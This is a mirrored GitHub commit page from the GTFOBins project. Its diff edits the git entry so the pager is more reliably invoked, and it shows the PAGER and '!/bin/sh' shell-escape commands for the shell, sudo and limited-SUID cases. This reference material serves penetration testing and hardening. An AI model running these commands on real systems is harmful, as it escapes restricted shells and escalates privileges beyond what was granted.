mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Increase the probability that the pager is called by Git
`git help config` produces a much longer output, hopefully longer than the terminal window. Close #62
This commit is contained in:
parent
ac68a5864a
commit
b8493f916d
@ -4,13 +4,13 @@ functions:
|
|||||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
code: |
|
code: |
|
||||||
git -p help
|
git help config
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo:
|
sudo:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
code: |
|
code: |
|
||||||
sudo git -p help
|
sudo git help config
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||||
|
Loading…
Reference in New Issue
Block a user